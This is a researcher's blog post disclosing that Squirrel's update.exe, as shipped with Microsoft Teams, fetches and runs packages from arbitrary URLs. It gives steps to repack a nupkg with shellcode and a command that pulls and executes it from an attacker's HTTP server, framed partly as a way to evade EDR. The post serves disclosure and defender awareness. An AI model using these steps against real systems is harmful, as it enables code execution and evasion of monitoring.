Friday, June 28, 2019

Nuget/Squirrel uncontrolled endpoints leads to arbitrary code execution

Update 2/July/2019

When i was researching Microsoft ‘Teams,’ I came across an interesting argument ‘update’, I got to know from Squirrel documentation that this command will download and execute the respective Nuget package automatically, I was like why Microsoft has this feature? can i exploit this?
The Package creation was bit challenging one, It took some hours to figure out how easy it is, Then i tried to create a reverse shell , tried the update command from Microsoft Teams and voila! I got a reverse shell.
I reported to Microsoft and they are not bad, they responded to me and validated the vulnerable endpoint and postponed the fix to future release, I was waiting for the fix so i can make it release publicly.
But, Of-course most of them hunting for the exploits and doing good for the community to protect from adversaries, I got an update in my Twitter that another researcher released similar vulnerable endpoint in Microsoft Teams that also from ‘update.exe’ , Got an update that also researched about Squirrel packages initially , The both researchers did a fantastic work on this, So i decided finally to make it public since i spent most of the time in this and without fixing this, the adversaries/insiders likely use this technique for EDR/IDS evasion, So this post will make the blueteam-defense team aware of this situation.
Vulnerable Endpoints :

Payload creation :

Payload preparation:

  • extract any nupkg package, in my example Exploit-1.5.60-full.nupkg
  • goto Exploit-1.5.60-full\lib\net45 and drop your shellcode as ‘squirrel.exe’
  • compress the complete folder as ‘Exploit-1.5.60-full.nupkg’
  • Calculate the metadata with below command. 
sha1sum Exploit-1.5.60-full.nupkg && wc -c < Exploit-1.5.60-full.nupkg
Output : fa8b87f0b995498a6e890c832dcaf968997608d4 Exploit-1.5.60-full.nupkg 4695

  • create a file named RELEASES and copy the above output and save. 
  • So the main directory contains 2 file Exploit-1.5.60-full.nupkg and RELEASES.
  • upload to any http server.

How to attack :

  • Download and execute:

Step 1: Go to target application folder, So go to “%localappdata%[application Folder]
Step 2: Run the below command,

update.exe — update=[http server contains the above 2 files]
E.g update.exe — update=

Now the update command will download the malicious package and install automatically

2. Download

update.exe — download=[http server contains the above 2 files]

It will download the package containing shellcode to “packages” folder.

What is the impact?
  1. Malicious code execution from Microsoft legitimate binary (Living off the Land)
  2. No special privilege required, just a standard windows user can able to exploit this.
  3. RedTeam/Insiders will use this evade EDR/IDS.
  4. Privilege escalation happens, if the application has control of SYSTEM files.
What is the Issue?
  1. There is no controlled design that application to update from authenticated URL.
  2. Allowing 3rd party url to download the package.
  3. I would not say the issue with Squirrel application design, but Developers might redact the unwanted arguments and push automatic updates.


Post a Comment